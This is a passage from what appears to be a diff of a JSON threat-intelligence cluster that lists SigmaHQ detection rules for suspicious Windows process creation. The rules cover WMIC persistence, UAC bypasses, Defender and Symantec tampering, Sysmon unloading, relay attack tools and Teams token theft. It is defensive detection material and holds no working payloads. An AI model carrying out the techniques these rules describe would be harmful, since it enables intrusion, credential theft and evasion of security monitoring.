Winrm.vbs" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_winzip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" + }, + { + "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/25", + "falsepositive": [ + "Legitimate software creating script event consumers" + ], + "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", + "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" + }, + { + "description": "Detects WMIC executing suspicious or recon commands", + "meta": { + "author": "Michael Haag, Florian Roth, juju4, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" + ], + "filename": "proc_creation_win_susp_wmic_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ] + }, + "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", + "value": "Suspicious WMIC Execution" + }, + { + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wmic_proc_create.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "value": "Suspicious WMIC Execution - ProcessCallCreate" + }, + { + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/01/30", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1355171195654709249", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "value": "Wmic Uninstall Security Product" + }, + { + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2021/10/21", + "falsepositive": [ + "Legitimate usage of the uncommon Windows Work Folders feature." + ], + "filename": "proc_creation_win_susp_workfolders.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/elliotkillick/status/1449812843772227588", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", + "value": "Execution via WorkFolders.exe" + }, + { + "description": "Detects code execution via the Windows Update client (wuauclt)", + "meta": { + "author": "FPT.EagleEye Team", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" + ] + }, + "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "value": "Windows Update Client LOLBIN" + }, + { + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + ], + "tags": "No established tags" + }, + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty Cmdline" + }, + { + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zipexec.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1451237393017839616", + "https://github.com/Tylous/ZipExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", + "value": "Suspicious ZipExec Execution" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "value": "Zip A Folder With PowerShell For Staging In Temp" + }, + { + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "creation_date": "2021/02/02", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_sus_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", + "value": "Suspicious Auditpol Usage" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "proc_creation_win_sysinternals_eula_accepted.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", + "value": "Usage of Sysinternals Tools" + }, + { + "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/16", + "falsepositive": [ + "Legitimate use of PsService by an administrator" + ], + "filename": "proc_creation_win_sysinternals_psservice.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "value": "Use of Sysinternals PsService" + }, + { + "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "value": "SharpEvtMute EvtMuteHook Load" + }, + { + "description": "Detect possible Sysmon driver unload", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_driver_unload.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" + ] + }, + "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "value": "Sysmon Driver Unload" + }, + { + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_exploitation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", + "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + ], + "tags": "No established tags" + }, + "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "value": "Suspicious Sysmon as Execution Parent" + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", + "value": "UAC Bypass via Event Viewer" + }, + { + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysnative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + ], + "tags": [ + "attack.t1055" + ] + }, + "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "value": "Process Creation Using Sysnative Folder" + }, + { + "description": "Detects a Windows program executable started from a suspicious folder", + "meta": { + "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "creation_date": "2017/11/27", + "falsepositive": [ + "Exotic software" + ], + "filename": "proc_creation_win_system_exe_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "value": "System File Execution Location Anomaly" + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "value": "Tamper Windows Defender Remove-MpPreference" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "proc_creation_win_tap_installer_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "99793437-3e16-439b-be0f-078782cf953d", + "value": "Tap Installer Execution" + }, + { + "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "meta": { + "author": "Ilya Krestinichev, Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_taskkill_sep.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.exploit-db.com/exploits/37525", + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", + "value": "Taskkill Symantec Endpoint Protection" + }, + { + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/01/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_task_folder_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/subTee/status/1216465628946563073", + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" + ] + }, + "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "value": "Tasks Folder Evasion" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "value": "Suspicious Command With Teams Objects Pathes" + }, + { + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_termserv_proc_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", + "value": "Terminal Service Process Spawn" + }, + { + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate files with these rare hacktool names" + ], + "filename": "proc_creation_win_tools_relay_attacks.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1557/001/", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://github.com/ohpe/juicy-potato", + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", + "value": "SMB Relay Attack Tools" + }, + { + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "value": "UAC Bypass Tools Using ComputerDefaults" + }, + { + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "value": "NirCmd Tool Execution" + }, + { + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "value": "NirCmd Tool Execution As LOCAL SYSTEM" + }, + { + "description": "Detects the use of NSudo tool for command execution", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nsudo_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", + "value": "NSudo Tool Execution" + }, + { + "description": "Detects PsExec service execution via default service image name", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tool_psexec.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", + "value": "PsExec Tool Execution" + }, + { + "description": "Detects the use of RunXCmd tool for command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_runx_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.d7xtech.com/free-software/runx/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "93199800-b52a-4dec-b762-75212c196542", + "value": "RunXCmd Tool Execution As System" + }, + { + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "meta": { + "author": "frack113", + "creation_date": "2022/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tor_browser.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ] + }, + "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "value": "Tor Client or Tor Browser Use" + }, + { + "description": "Detect use of TruffleSnout.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_trufflesnout.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "value": "Launch TruffleSnout Executable" + }, + { + "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the utilities by legitimate user for legitimate reason" + ], + "filename": "proc_creation_win_trust_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", + "value": "Domain Trust Discovery" + }, + { + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "value": "UAC Bypass Using ChangePK and SLUI" + }, + { + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + 